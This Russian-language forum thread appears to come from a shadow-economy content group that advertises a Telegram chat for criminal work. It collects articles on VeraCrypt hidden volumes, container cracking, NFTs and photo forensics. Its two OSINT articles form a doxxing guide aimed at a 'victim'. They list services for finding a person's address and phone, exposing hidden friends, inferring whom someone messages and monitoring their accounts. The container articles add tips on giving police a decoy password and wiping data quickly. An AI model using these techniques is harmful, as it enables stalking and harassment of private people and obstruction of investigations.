Просмотр полной версии : NEW Авторские статьи / схемы заработка от BlackMast
BlackMAST
24.02.2022, 15:56
https://i.imgur.com/O5ovlEr.gif
Приветствуем всех читателей и участников форума!
В этой теме мы будем публиковать наши авторские статьи.
Наша команда писателей тщательно выбирает интересные темы и пишет оригинальный контент специально для вас!
Каждую неделю мы будем делиться с вами новым контентом, связанный с дарком!
Еще больше контента можно найти на нашем канале в Телеграме!
https://t.me/+_nx0mbcIGWlhMTFi
Авторские статьи по заработку, мануалы и скрипты по безопасности
Абсолютно каждый день свежие новости про крипту, теневые темы, криминал и NFT
Так же у нас есть чат, где можно найти работу в теневой сфере или подыскать покупателей на свои услуги!
BlackMAST
04.03.2022, 12:38
https://i.gyazo.com/ace030fed4d3b4e906794c5fc56fafa5.jpg
Криптоконтейнер. Создаем "сейф" в ПК
вступить в чат
Криптоконтейнер простым языком - это защищенный сейф в вашем компьютере. Многие люди пренебрегают защитой своих данных. А зря. Всю важную информацию необходимо хранить в криптоконтейнерах, дабы она не попала в руки третьих лиц. Вооружившись новыми знаниями в данной статье, вы сможете создавать зашифрованные контейнеры, обладающие высокой стойкостью к атакам. Создавать мы будем как обычный том, так и скрытый (с двойным дном).
Плюсы криптоконтейнера
Безопасность. Ваши файлы будут надежно защищены. Тем не менее любая система не без изъянов, и существуют методы взлома, практикующиеся спецслужбами. О них мы поговорим в следующей статье и предложим способы, которые помогут их избежать.
Экстренное уничтожение. Если вы решите удалить файлы, хранящиеся на жестком диске, то удаление обычным способом займет очень много времени, в то время как программа CryptoCrash поможет ликвидировать информацию с криптоконтейнера за считанные секунды.
Программа для шифрования
TrueCrypt или VeraCrypt?
В 2014 году разработчики TrueCrypt заявили, что больше не будут поддерживать проект и предложили своим пользователям альтернативу в видe VeraCrypt. Они также отметили, что VeraCrypt значительно выигрывает у TrueCrypt.
Какие плюсы у VeraCrypt?
VeraCrypt более устойчива от брутфоса (атак прямого перебора ключей);
Имеет поддержку разработчиков и регулярно обновляется.
Переходим к практической части.
Как создать криптоконтейнер
Первым шагом нужно будет скачать программу VeraCrypt, предназначенную для быстрого шифрования.
Переходим на сайт veracrypt.fr -> "Downloads"
https://i.gyazo.com/04c605eb92937fdfd165dd7318207701.jpg
Выбираем свою операционную систему и скачиваем.
https://i.gyazo.com/6c8fe1bbcebc2e6c7e1df30688842fbf.jpg
После того как программа успешно установлена на ПК, начинаем создание криптоконтейнера. Для этого жмем "Создать том".
https://i.gyazo.com/84af7407a376d972c5eb12f01c1c6e2d.jpg
Обычный том
Вначале мы рассмотрим, как создавать обычный криптоконтейнер, после чего перейдем к скрытому.
Выбираем “Создать зашифрованный файловый контейнер”.
https://i.gyazo.com/6b1692df307f8544fa47d60be098e3d3.jpg
Сейчас нам нужен "Обычный том", он в дальнейшем послужит местом хранения скрытого.
https://i.gyazo.com/5be95452147f88cccc7cf6a5b3a4e77e.jpg
Выбираем место хранения и имя файла (абсолютно любое). Сам файл может иметь какое угодно расширение, например, .mp4, .txt, .wav.
https://i.gyazo.com/3e77dde3038e27f229ba98dc7c6008ea.jpg
Затем нам нужно настроить шифрование. VeraCrypt использует такие алгоритмы шифрования как: AES, Serpent, Twofish, Camellia, Кузнечик и их связки.
Для того чтобы зашифровать (и расшифровать) данные, криптоконтейнер не использует пароль. Для шифрования любым алгоритмом (от AES до «Кузнечика») используется двоичный ключ фиксированной длины, так называемый Data Encryption Key или Media Encryption Key (MEK).
Ключ шифрования (MEK) хранится в оперативной памяти совершенно независимо от того, какой алгоритм шифрования вы выбрали в настройках контейнера: AES, Twofish, Serpent, «Кузнечик» или любая комбинация алгоритмов, сложность и скорость их извлечения практически одинакова.
https://i.gyazo.com/c4215779910d9dbbd59a424d0628ee2b.jpg
Далее требуется обозначить размер нашего тома.
https://i.gyazo.com/7b9fe0b4722099abf4ea522947da3e35.jpg
Пароль от обычного тома не обязательно должен быть очень сложным, так как всю важную информацию мы все равно будем хранить в скрытом криптоконтейнере.
https://i.gyazo.com/10ff55192a0a07324bc5a8b123f3b7b0.jpg
После выполнения всех предыдущих шагов запустится форматирование тома, и криптоконтейнер будет создан.
https://i.gyazo.com/afdb70cd16b969fed1b66c25ee90a4be.jpg
Скрытый том
Чтобы создать скрытый криптоконтейнер, выберите “Создать зашифрованный файловый контейнер”, как и в предыдущий раз, только далее вместо обычного тома, нужно выбрать "Скрытый том VeraCrypt".
https://i.gyazo.com/ea8a06e5c1e5a6532560d0bda6f607fd.jpg
Существует два режима создания тома, их подробное описание указано на скриншоте. Как вы можете увидеть, опция "Обычный режим" предназначена для тех, кто еще не создал обычный том, но так как он у нас уже имеется, то кликаем на "Прямой режим".
https://i.gyazo.com/00ba4d7c40b530607252359f0f685d5e.jpg
Далее указываем расположение ранее созданного обычного контейнера и вводим пароль от него, который вы установили.
Выбираем любой алгоритм шифрования, допустим AES.
Указываем размер скрытого тома и вводим уникальный пароль (подробнее о создании надежного пароля вы узнаете в следующей статье).
Готово! Вы успешно создали криптоконтейнер с двойным дном.
https://i.gyazo.com/f5ac5549b2c9b46b14392a97a48022f6.jpg
Чтобы его открыть нужно выбрать ваш файл и ввести пароль от обычного или скрытого контейнера, в зависимости от того какой вам требуется.
Вывод
Несмотря на то что криптоконтейнер крайне надежная штука, это не исключает возможности его взлома, как бы печально это не звучало. Не существует 100 % гарантии безопасности, это утопия. Но криптоконтейнер способен значительно усложнить возможную атаку на него или вовсе свести к минимуму. О существующих способах взлома и вариантах их избежать мы поговорим в следующей статье.
https://telegra.ph/Kriptokontejner-S...ejf-v-PK-02-08
BlackMAST
10.03.2022, 20:11
https://i.gyazo.com/5e28d9e2f988df3ad107663197d51b21.jpg
Как взламывают криптоконтейнеры
Вступить в наш чат
"Криптоконтейнер нельзя взломать", - многие говорят. Но вынуждены вас разочаровать, это не так. Существует достаточно много способов, которые способны нанести ущерб вашим файлам, хранящимся в криптоконтейнере, и поставить под сомнение вашу безопасность. Будучи ознакомленным с данной информацией, вы измените свой взгляд на криптоконтейнеры и вопросы безопасности в целом. В конце этой статьи мы предложим несколько ценных рекомендаций, которые помогут сделать ваши криптоконтейнеры более устойчивыми к всевозможным атакам.
https://i.gyazo.com/60e31eb3b1133dbe7d4cd505a63deac3.jpg
Способы взлома
Взлом через уязвимость программного обеспечения
Программы, которые шифруют ваши данные, могут делать это не очень надежным способом. Да, процент подобного взлома невелик, но все же он есть. Поэтому мы обязательно рекомендуем использовать только проверенные софты, такие как VeraCrypt или TrueCrypt.
BruteForce или атака полным перебором
Данный метод подбора пароля, используемого для шифрования, часто применяется хакерами. Скорость успешного выявления нужного ключа крайне низка и займет десятки лет, но только в том случае, если BruteForce делается на стандартном компьютере со стандартной мощность. Вы не можете исключить тот факт, что подбор пароля может быть произведен на супермощном компьютере со скоростью в тысячи раз выше обычной. Тем не менее, такая процедура не только энергозатратная, но и очень дорогостоящая. Если вы не опасный киберпреступник или террорист, то такая опасность вам не грозит.
Для обычных людей чаще всего применяется более упрощенный BruteForce по словарю. Это значит, что существует многомиллионная база паролей, каждый пароль из которой проверяется. Такой подбор не требует никаких затрат и отличается своей простотой. И единственный способ его избежать - придумать такой пароль, чтобы его не оказалось в базе.
Помимо BruteForce по словарю, есть еще один вид атаки с помощью подбора. Он выглядит следующим образом: собирается вся информация о вас, включающая возраст, адрес, девичью фамилию матери, кличку питомца. После чего генерируется возможные варианты ключа. К примеру, вашего питомца зовут Бобик, значит программа будет использовать такие варианты: Bobik123, B1o2b3i4k5 и так до бесконечности.
Терморектальный (бандитский) криптоанализ
Само название говорит о сути данного метода. В его основе лежат угрозы, пытки и шантаж. Таким образом, никакие сложные пароли вам не помогут, но и здесь есть выход.
Вам необходимо установить программу быстрого уничтожения файлов, такую как Panic Button, она за считанные секунды удалит всю информацию о криптоконтейнере.
Используйте криптоконтейнер с двойным дном. Как его создать подробно описано в этой статье. В таком случае вы можете выдать пароль от обычного тома, а про существование скрытого никто не узнает.
Файл-ключ на microSD карте. При создании криптоконтейнера вам необходимо добавить файл-ключ, расположенный на microSD. Такую карту очень легко уничтожить, сломав ее, тогда вся ваша зашифрованная информация не будет подлежать восстановлению.
Вредоносный вирус
Если так случится, что ваш компьютер окажется заражен трояном или кейлоггером, то ваша приватность окажется под угрозой. Чтобы этого не случилось нужно использовать комплексную защиту вашего ПК. Файл-ключ эффективен не только в борьбе с терморектальным криптоанализом, он так же поможет избежать расшифрования в случае кейлоггера. Не помешает и временное отключение компьютера от сети в момент пользования криптоконтейнером.
Криминалистический анализ дампа памяти
Правоохранительные органы довольно часто используют данный метод. В ходе обыска компьютер изымается, происходит снятие оперативной памяти, а после чего находится информация о паролях. Чтобы сделать дамп, ваш ПК должен быть включен, а криптоконтейнер смонтирован. Дабы избежать такой участи, обязательно установите время автоматического демонтирования. Если вы работаете с очень секретными данными, то поставьте время на 2 минуты, если вы обычный пользователь, то 60 минут будет достаточно. Программа Panic Button тоже не помешает в этом случае, так как она очищает данные из ОС в момент отсутствия.
Взлом при помощи запасного ключа
Если вы пользуетесь программой VeraCrypt, TrueCrypt и другими подобными, то такая уязвимость вам не грозит.
Но такой расклад все же возможен, если вы делали комплексное шифрование системы. Если вы пользователь Microsoft, то ключи сохраняются в Microsoft Account, если macOS, то в iCloud. Будьте внимательны, когда шифруете систему, сразу же отключайте автоматическое сохранение ключа в облаке, иначе все ваши данные могут быть расшифрованы, в случае доступа третьих лиц к вашей учетной записи.
Рекомендации для защиты криптоконтейнера
Создайте надежный пароль. В идеале он должен иметь от 30 до 50 символов и храниться только у вас в голове. Записывать его никуда нельзя, тем более раннее использовать где-либо еще. Для того, чтобы его не удалось подобрать методом BruteForce важно не использовать информацию, имеющую какое-то к вам отношение (имена, псевдонимы, клички), слова и фразы, даты тоже под запретом. Пароль должен содержать символы, цифры и буквы верхнего и нижнего регистра.
Регулярно меняйте пароль. Важно хотя бы один раз в год проводить смену всех паролей. Это нужно для того, чтобы избежать утечек данных, которые бывают у разных компаний.
Имейте более 1 криптоконтейнера. Неразумно хранить все данные в одном месте. Решите сколько криптоконтейнеров вам необходимо и загрузите туда все нужные файлы.
Используйте криптоконтейнер с двойным дном. Нужно иметь открытый и скрытый том. В случае, если правоохранительные органы потребует пароль от криптоконтейнера, то смело можно выдать от открытого, в то время как вся тайная информация останется скрытой от их глаз.
Маскируйте криптоконтейнеры. Надежно защитить криптоконтейнер не достаточно, более важно сделать так, чтобы его существование не было обнаружено. Для этого программа VeraCrypt не указывает на то, что перед нами находить криптоконтейнер. Вы можете выбрать любое расширение и поместить файл в папку с другими аналогичными расширениями.
Криптоконтейнер для приманки. Создайте криптоконтейнер и демонстративно поместите его в видное место, он нужен для отвлечения внимания от основного. Название тоже должно провоцировать интерес, например, "Главное". Загрузите туда маловажные файлы, которые в случае чего вы смело сможете продемонстрировать. Не забывайте регулярно создавать видимость работы с этим контейнером, периодически обновляя данные.
Вывод
Никто не может гарантировать вам полную безопасность, но, используя все вышеизложенные советы, вы способны сами себе ее обеспечить. Советуем вам пересмотреть свои взгляды на защиту информации и взять на вооружение, предложенные рекомендации. Надеюсь, что данная статья была полезной для вас. "Предупрежден - значит вооружен!".
https://telegra.ph/Kriptokontejner-S...ejf-v-PK-02-08
BlackMAST
10.03.2022, 20:22
https://i.gyazo.com/4f3022b0c001e7de08e2e7dc74458a8c.jpg
NFT - феномен в мире криптовалют
Вступить в наш чат
NFT - относительно новое явление, разговоры о котором доносятся отовсюду - новости, газеты, телевидение.
Что это такое и почему все про это говорят?
NFT - это аббревиатура от английского non-fungible tokens, что означает "невзаимозаменяемый токен". Взаимозаменяемость - ключевой момент всех фиатных валют, BTC, ETH всегда можно обменять на другую криптовалюту, что нельзя сказать про NFT. Невзаимозаменяемый значит уникальный, он может представлять из себя товар, картину, песню. Например, если взять искусство, то картины Ван Гога не ровняются картинам И. Е. Репина, так и токен NFT является неповторимым и единственным в своем роде. Его цель - интегрировать уникальные предметы в блокчейн. Эти активы одновременно являются объектами коллекционирования и приносят доход.
В технической основе невзаимозаменяемого токена чаще всего заложен Ethereum, точнее, стандарт ERC-721, в соответствии с которым создаются смарт‑контракты, позволяющие выпускать NFT.
https://i.gyazo.com/86122b15d94b1b58a407381da9a8739e.jpg
Как создать NFT-токен?
NFT-токены создаются в цифровом виде с помощью таких платформ, как Binance, OpenSea, Makerspace и т.д. С помощью этих платформ вы можете загружать, присваивать имя, добавлять описание к своим творениям и преобразовывать их в NFT.
Сейчас мы рассмотрим с вами процедуру создания на платформе Binance, которая займет не более 5 минут. Чтобы иметь доступ к созданию и другим расширенным возможностям Binance, вам нужно в обязательном порядке пройти верификацию и подтвердить личность. Также в данный момент создавать NFT на платформе могут только предварительно утвержденные авторы. Для того, чтобы вас утвердили, вы можете написать на почту nft@binance.com и прислать свои идеи, только таким образом работы смогут быть рассмотрены. Но в ближайшем времени данная услуга станет доступна для всех пользователей.
Для начала нам нужно перейти на главную страницу NFT площадки.
https://i.gyazo.com/99bd09800d53f9b6ed74db9ead353993.jpg
Далее нажимаем "Создать" и видим следующую страницу с доступными видами NFT: это может быть картинка, аудио, видео.
https://i.gyazo.com/0a4943658e4dc53d66f03265d6cea8e2.jpg
Вы можете создать как один NFT (BEP-721) или серию (BEP-1155). С помощью серии вы сможете продать несколько образцов своего творения, каждый с уникальным идентификатором.
Имейте ввиду, что за создание NFT-токена у вас возьмут комиссию. Под комиссией за транзакцию подразумевать все дополнительные расходы при продаже, отчисляемые платформе или автору. Если на других платформах процент комиссий может варьироваться от 2.5 до 15, то на Binance он значительно ниже и составляет 0,005 BNB. На Binance в качестве комиссии используется BNB (Binance Coin). Поэтому удостоверьтесь, что на вашем балансе есть данная криптовалюта.
После того, как ваш файл загрузится, Binance создаст NFT. Посмотреть как купленные, так созданные NFT можно в разделе "Коллекции" -> "Мои NFT".
Также, если у вас уже есть NFT на другой бирже, вы можете их импортировать на Binance.
Способы заработать с помощью NFT
NFT Airdrops (раздача). Вы можете стать обладателем NFT совершенно бесплатно, для этого существуют раздачи, которые в этом помогут: NFT holder airdrop, NFT platform airdrop.
NFT holder airdrop.Данный вид раздачи подразумевает, что вы уже являетесь владельцем NFT, в то время как автор выпускает различные штуки для дополнения. К примеру, в недавнем времени Bored Apes сделал подарок своим держателям. Так, владельцы обезьянок получили бесплатные сыворотки, которые меняли их персонажей в непохожих друг на друга мутантов. В скором времени обладателю такой сыворотки было предложено 269 ETH за ее продажу.
NFT platform airdrop.С повышением спроса на NFT появляются новые торговые площадки. Своим первым пользователям они дарят подарки в виде NFT. Поэтому, чтобы стать счастливым обладателем бесплатного токена, отслеживай новые маркетплейсы.
Трейдинг NFT. Суть просто - покупаешь дешевле, продаешь дороже. Про трейдинг криптовалютами мы рассказывали здесь.
Стейкинг(возможность заработать проценты на изменении курса криптовалюты). Данный способ не включает ваше активное участие. Для пассивного заработка требуется заложить свои NFT, тем самым обеспечивая работоспособность блокчейна.
Капитализация
Мировой рынок NFT в 2021 году достиг $22 млрд. С начала 2020 года общая капитализация NFT выросла в 56 раз.
Токен MANA, служащий для покупок различных виртуальных товаров на маркетплейсах, вырос на 40 процентов за последний месяц и занимает лидирующее положение среди прочих.
https://i.gyazo.com/e11fb871c19066433ec5c877de75b635.jpg
Минусы NFT
Отсутствие связи между подлинником и NFT. Покупателям кажется, что покупая NFT, они покупают оригинал. К сожалению, это лишь ловко созданная иллюзия. Приобретая NFT, вы получаете не произведение, а только токен, и ничем, кроме токена, вы не владеете.
Технические проблемы. Дело в том, что NFT-токен и само произведение хранятся по отдельности. Возьмем к примеру платформу Nifty Gateway. При публикации NFT, к любому токену, будь то картинка, аудио или видео, прилагается формат JSON (текстовый формат обмена данными). Ключевой момент в нем - это ссылка, указывающая на сервер Nifty, который при запросе перенаправит браузер на картинку, сохраненную в распределенной файловой системе IPFS. Выходит, что NFT, который вы покупаете, - это хеш‑сумма от файла JSON, а не от самого произведения. Токен при этом хранится в блокчейне Ethereum. Случись что с Nifty, связь тот час же прервется. IPFS также не гарантируют никакой надежности: данные тут хранятся до тех пор, пока их активно запрашивают.
Нет гарантий.Вы можете вложиться в NFT, ждать момента, пока он вырастет в цене, но этого так и не произойдет. Одним из таких ярких примеров является проект CryptoKitties, как только NFT с котятами поступили в продажу, люди массово стали их скупать по $300, посчитав, что они взлетят в цене. Но котята не только ни взлетели, а упали аж до $2, как только ажиотаж прошел. Разработчики же перевели всю ситуацию в шутку, назвав котят всего лишь развлечением ради игры, а не для прибыльных вложений. Так что, если вы приобрели кота и прогорели, то это ваша проблема.
https://i.gyazo.com/180c9618e38e03d746eb3f88f2f57e8e.jpg
Нет авторских прав. Может показаться странным тот факт, что вы платите большую сумму денег за картинку, но по-прежнему не обладаете ей? NFT не равно авторским правам. Владеет всеми правами только один человек - это создатель. Но как так получается? Всему виной шардинг.
Шардинг
Простыми словами шардинг - это дробление, которое разбивает токен NFT на части поменьше. Сама идея разделения криптовалюты не нова и появилась она из-за ряда возникших проблем. Изначально, покупая NFT с изображением какой-либо картины, вы автоматически приравнивались к владельцу, в том числе обладающим всеми авторскими правами. Поэтому была предложена система шардов, которая позволяет сохранить основные авторские права его создателя, тем не менее покупатель остается вправе демонстрировать NFT, распечатывать копию.
владелец выбирает сколько шардов всего будет, какие из них он выставит на продажу, а какие оставит себе;
устанавливает цену для каждой части.
Как получить все шарды?
Выкупить все части. Однако есть ряд сложностей, которые не позволят вам этого сделать. Например, некоторые части уже могут быть куплены или просто-напросто не выставлены на продажу.
Допустим, вы уже владеете некой частью шардов NFT, но вам не хватает какого-то количества. Вы можете выкупить недостающие части у других держателей, для этого назначьте цену выкупа и депонируйте шарды в смарт-контракт.
Но даже, если вы выкупите все части, вы все равно не сможете побороться за право владения авторскими правами. Суд все равно будет на стороне автора-создателя, а не на вашей.
Обычно в ходе разделения токен ERC-721 NFT разбивается на взаимозаменяемые части, то есть на токены ERC-20.
Платформы для дробления
Nftfy - считается первой платформой по дроблению NFT
Fractional.art - дает возможность делить целые коллекции
Потенциал NFT
В настоящее время рынок NFT развивается с бешенной скоростью, охватывая все большие массы. Что касается инвестиций, то риск безусловно есть, так как NFT находится в прямой взаимосвязи со спросом, существующим в определенный момент. Тем не менее цифры и тот факт, что многие известные личности инвестируют в NFT или продают свое творчество, свидетельствует о том, что интерес к NFT растет.
Во второй части вы узнаете о ТОП-10 самых ошеломляюще дорогих NFT за всю историю.
https://telegra.ph/Kriptokontejner-S...ejf-v-PK-02-08
BlackMAST
24.03.2022, 17:13
https://i.gyazo.com/16e9efa1e7ae00aa04128d04f969d963.jpg
Назови мне свое имя, и я скажу, кто ты: как "пробить" человека?
Вступить в наш чат
Так или иначе, любой человек оставляет своей след в всемирной паутине. Каждый второй сайт собирает, хранит, обрабатывает, а иногда и продает ваши данные третьим лицам.Утечки данных и пренебрежение безопасностью многих людей дают возможность для быстрого сбора информации. Не нужно быть хакером, совершать какие-либо противоправные действия или иметь доступ к закрытым базам правоохранительных органов, чтобы пробить конкретного человека, вся информация лежит на поверхности. Все, что нам нужно - это знать несколько терминов и открытые источники по поиску данных. Обо всем этом и пойдет речь в статье.
Википедиягласит: «90 процентов разведданных приходит из открытых источников и только 10 — за счёт работы агентуры»
OSINT (Open-source intelligence) - разведка в открытых источниках, включает в себя поиск, анализ и сбор разведывательной информации, полученной из общедоступных источников. OSINT не является взломом, шпионажем, вербовкой или иным противозаконным действием.
Этапы:
https://i.gyazo.com/cdd47e9924a20302911e6bc98b6d1647.png
Постановка/формулировка задачи;
Планирование;
Сбор данных;
Обработка информации;
Анализ результатов и отчет.
Постановка задачи:
На начальном этапе важно установить для себя цель, к примеру: "Нужно узнать как можно больше информации об этом человеке". Под информацией мы подразумеваем его биографию, психологический портрет, место жительства, работы и другую важную для нас информацию.
Планирование:
Не имея четкого плана, вы будете долго блуждать на просторах интернета, тщетно пытаясь хоть что-то найти. В лучшем случае вы сможете найти какие-то обрывки данных, в худшем потратите свое время.
Итак, как выстроить план:
Известная информация
Подумайте, что на данный момент у вас уже имеется: имя, почта, фотография, круг друзей, телефон и т.д. Это может быть любая информация, за которую хоть как-то можно зацепиться. Даже, казалось бы, обычный ник, используемый в интернете, уже может ускорить поиск.
Гипотезы
Когда вы собрали всю известную информацию, вам нужно выстроить несколько предположений. Например:
У вас есть фото, значит вы можете приблизительно установить возраст человека. На фотографии он находится рядом с машиной, следовательно формулируем гипотезу, что машина принадлежит ему и предполагаем ее марку. На нем надет деловой костюм, скорее всего он работает в офисе и т.п.
Будьте готовы к тому, что многие ваши гипотезы могут не подтвердиться, в таком случае сразу же откидывайте несоответствующие и заменяйте новыми предположениями.
Имея несколько гипотез, вы можете переходить к следующему этапу - поиску информации.
Сбор данных
Пожалуй, самый важный и сложный этап всей работы. Для того, чтобы собрать данные нужно знать, где их искать. И начнем мы с самого простого и очевидного на первый взгляд метода поиска данных:
Поисковики
Вы можете найти колоссальное количество информации в обычном Google, если будете правильно составлять запрос. А помогут вам в этом поисковые операторы, о которых мы говорили в прошлой статье.
Предлагаю вашему вниманию подборку поисковиков для облегчения поиска:
http://www.searchenginesindex.com/ru/ - подборка поисковиков по всем странам.
https://toolbox.google.com/datasetsearch - бета-версия поисковика Google по базам данных.
https://hackernoon.com/untraceable-s...s-alternatives - англоязычный поисковик, довольно популярный.
https://findo.com/ - умная система поиска по всем личным документам, облачным хранилищам, соцсетям, а так же файлам на устройствах.
https://www.deepgram.com/ - поисковик по аудиофайлам.
http://www.data.gov/ - специализированный поисковик по всем сайтам и открытым базам данных американского правительства.
Omgili - Find out what people are saying - поисковик по форумам, добирается в самые дебри мирового интернета.
http://www.revimg.com/ - поисковик по фотографиям, позволяющий определить, где ранее были размещены изображения.
https://lumendatabase.org/ - база данных для сбора и анализа юридических запросов на удаление контента. С помощью Lumen можно посмотреть, кем был создан запрос и увидеть удаленный материал.
Поиск информации по номеру телефона
Nomer.org - крупная база номеров России и некоторых стран СНГ. Позволяет узнать имя человека или же по имени найти номер телефона и адрес проживания. Для обхождения блокировки нужно использовать VPN.
https://ftpn.ru/search-phone/ выдает по номеру телефона дорки в Google и Яндекс.
Поиск информации по Email
Сервисы, позволяющие проверить существование адреса электронной почты:
https://2ip.ru/mail-checker/
https://www.zerobounce.net/
Более подробная информация:
https://emailrep.io/
https://www.spydialer.com/default.aspx
Поиск по ФИО
Occrp - находит людей, используя миллионы документов, файлов, утечек.
Infobel - ищет человека в любой точке мире, показывая номер телефона, адрес.
Zytely - покажет адрес человека по ФИО, либо наоборот, но для этого нужно знать город.
Yasni - поиск людей по фамилии, имени или никнейму, выдает фото, адрес, номер телефона, профили в социальных сетях.
Clustrmaps (https://clustrmaps.com/p/) — находит адрес проживания, номер телефона, возраст, место работы, специальность и многое другое.
Обработка информации
Когда данные собраны, переходим к следующему этапу - обработка. Определяем какая информация у нас есть, и что она дает. Также оцениваем логичность данных, они не должны противоречить друг другу.
Отчет
Так как мы занимаемся разведкой в личных целях и в рамках закона, нам не нужно составлять сложные графики. Однако, полученные данные все равно лучше зафиксировать, так как сложно удержать все в голове. Самый простой вариант: таблица. Она поможет сгруппировать небольшое количество информации в единое целое. Но если накопилось много данных - таблица не поможет, тогда на помощь приходят mindmaps (схемы связей и детализации между объектами). С помощью mindmaps можно увидеть закономерность или общую связь, которая раньше не приходила на ум.
Вывод:
Таким образом, мы узнали, что такое OSINT, рассмотрели его этапы и выяснили, как собирать данные о конкретном человеке в открытых источниках. Существуют огромные возможности, воспользовавшись которыми вы можете попробовать себя в роли интернет-разведчика. Это лишь часть полезных сайтов для поиска интересующей информации. В следующей статье мы более подробно разберем полезные ресурсы по поиску в социальных сетях и пробиву по фотографиям.
BlackMAST
24.03.2022, 17:58
https://i.gyazo.com/7de6932a774f8dfb31ca0a75cc94342d.jpg
Назови мне свое имя, и я скажу, кто ты: деанон по социальным сетям
Вступить в наш чат
Ни для кого не новость, что социальные сети могут сказать о человеке то, что он и сам не понимает до конца. Ваши интересы, хобби, социальный круг, место жительства - все это и многое другое может стать известным всем желающим. Более того, вся нужная информация находится в открытых источниках. Да, любой человек, не имевший ранее дела с интернет-разведкой, после прочтения данной статьи с легкостью сможет найти много интересного о жертве. Но прежде чем мы начнем, советую вам ознакомиться с базовыми знаниями по OSINT.
Социальные сети
Поиск в таких социальных сетях как Facebook, VK, Instagram, Twitter - главные отправные точки. Их возможности беграничны: поиск по городу, имени, возрасту, учебе и другим данным не составляет труда. Но есть и некоторые неочевидные вещи. Существует ряд ресурсов, о возможностях которых вы не догадываетесь. Они не только облегчают поиск, но и помогают обнаружить информацию, которая скрыта на странице пользователя.
С чего начать поиск?
Личные данные
ФИО, фотография, ник, дата рождения, телефон, семейное положение, адрес, образование и т.д. Если вам известно хотя бы одно из этого, то вы уже в состоянии начать поиск.
Представим следующую ситуацию: вам известен только никнейм человека или его email, но вы понятия не имеете в каких социальных сетях начать поиск.
Тогда предлагаю воспользоваться следующими сервисами:
https://knowem.com/ - на данном сайте представлено свыше 500 соц. сетей, вам лишь нужно вести нужный ник, и сервис покажет в каких соц. сетях зарегистрирован пользователь.
https://pipl.com/ - полезный ресурс для поиска человека по почте или никнейму. Аналогично предыдущему ищет профили в самых популярных соц. сетях. Несмотря на то что сайт платный, вам предоставляется пробный период 14 дней.
Социальный поиск
Поисковики Google, Yandex индексируют данные из социальных сетей, но зачастую это лишь имя, фамилия и небольшое описание. Операторы поиска помогут найти намного больше, чем обычный запрос в поисковике.
Так, если знать прежний id пользователя или сообщества, которые больше не существуют, можно из кэша поисковика обнаружить удаленный контент, который был на странице на момент индексации. Это также работает и с недавно удаленными постами.
Для поиска профиля человека введите: "vk id7654321";
Для сообщества: "vk club7654321";
Поиск поста: "vk wall7654321", "vk wall-7654321?offset=20" (и менять значение offset, то есть смещения: 40,60,80). Используйте дефис по той причине, что некоторые id сообществ могут совпадать с id пользователей;
Для альбомов: "vk.com/album-7654321_0".
Круг общения
Круг общения человека оставляет очень сильный отпечаток в сети. Его можно отследить и воспроизвести. Но поиск информации - занятие рутинное и несет мало пользы, если не иметь представления, что и где искать. Довольно часто вы можете столкнуться с такими проблемами как: закрытый профиль, скудное количество данных и т.д. Таким образом, вы доходите до того, что часами прочесываете все социальное окружение человека, пытаясь найти хоть какую-то зацепку.
Если человек предпочел скрыть свой аккаунт Вконтакте, то это не проблема, так как его друзья могут предоставить гораздо больше данных о нем. Попробуйте воспользоваться следующими сайтами:
http://220vk.com/ - всеобъемлющий сервис, включает такие неявные возможности как: скрытые друзья, исходящие лайки, комментарии, цепочки друзей, черный список, города друзей и другой мониторинг страниц. Также способен установить наблюдение за аккаунтом и отслеживать его.
https://vkdia.com/ - узнайте с кем человек ведет переписку, предположительно показывает собеседников с помощью временных интервалов, определяет время проведенное в сети. Не требует авторизации и абсолютно бесплатный.
Facebook же имеет такой сервис как Graph Search, но он все равно мало чего может дать.
Возьмите на вооружение сайт graph.tips, который покажет куда больше информации: посещенные места, комментарии на фотографиях и многое другое.
http://likealyzer.com/ - мониторинг активности страницы.
https://searchisback.com/ - ищет профиль человека по городу, семейному положению, интересам и др.
https://findmyfbid.in/ - определяет ID профиля, который изначально скрыт. Благодаря ID вы можете находить любую информацию.
http://zesty.ca/facebook/ - поиск информации по ID.
whopostedwhat.com - ищет посты в Facebook.
@getfb_bot - бот в телеграме, найдет страницу по номеру телефона.
phantombuster.com - с помощью данного сервиса вы можете сделать парсинг страницы.
Интересы и сообщества
Помимо круга общения, помощниками могут стать интересы. Присмотритесь в каких сообществах состоит человек, он наверняка будет иметь парочку любимых, которые скажут о его хобби. Если сообщества отсутствуют, то начинаем мониторинг лайков. Вконтакте имеет кучу сайтов для слежения за активностью:
http://220vk.com/
Шпион ВК онлайн бот. Поиск ВКонтакте: лайки, диалоги, комментарии, слежка
С другими социальными сетями дела обстоят немного иначе. Для поиска лайков и комментариев, например, в Instagram можно воспользоваться поисковым оператором «site:instagram.com».
Вывод
В этой статье мы максимально постарались собрать всю главную информацию и самые полезные ссылки на рабочие сервисы по OSINT в социальных сетях. Надеемся, что данная информация была вам полезной, и вы узнали хоть что-то новое про распространенные инструменты и методы их использования. В следующей статье вы узнаете, как найти человека только по фотографии, а также как устроен поиск по изображению.
https://telegra.ph/Nazovi-mne-svoe-i...m-setyam-02-27
BlackMAST
24.03.2022, 18:07
https://i.gyazo.com/853e1432d5ea1ddb1bd2d7e171ba3c08.jpg
Не верь своим глазам. Как определить и скрыть фотошоп
Вступить в наш чат
Фотография редко предстает перед нами в исходном виде. Зачастую то, что вы видите - это результат долгого и качественного монтажа. Пускают пыль в глаза не только девушки из инстаграма, но так же и многие сервисы. Практически всегда любые услуги сопровождаются картинками, скриншотами. И у вас могут возникнуть сомнения в честности продавца и в предоставляемой им услуге. Нельзя со 100% гарантией сказать, подвергалась ли фотография обработке или нет, но как и везде существует человеческий фактор - неопытность отрисовщика и ваши знания в этом деле. Данная статья поможет вам разобраться в видах монтажа и как его разоблачить.
https://i.gyazo.com/2d2417e241230d451522973cd911d4cc.jpg
Нет единого алгоритма, который определил бы фотошоп. Нельзя загрузить фото в программу и быть уверенным, что она сможет определить монтаж по шумам или, что еще лучше, по отсутствию метаданных. Все методы должны использоваться в совокупности. Существует даже целое подразделение в криминалистике, которое получило название Image Forensics или "криминалистика изображений", в его основе лежит задача определить подлинность фотографии и наличие изменений.
Разберем основные алгоритмы Image Forensics:
Внимательный осмотр
Ваши глаза - основной инструмент. Достаточно загрузить фотографию в любой редактор, увеличить зум на максимум, и все недочеты предстанут перед вами.
Как, например, на этой фотографии. Вы хорошо можете заметить склейки и разрывы полосок, чего никак не должно быть.
https://i.gyazo.com/50288fe527b25d83ea3bc9a9507c065f.jpg
Ко всему прочему, монтаж может быть настолько дилетантским, что, загрузив фото в ExifTool, вы увидите такую картину:
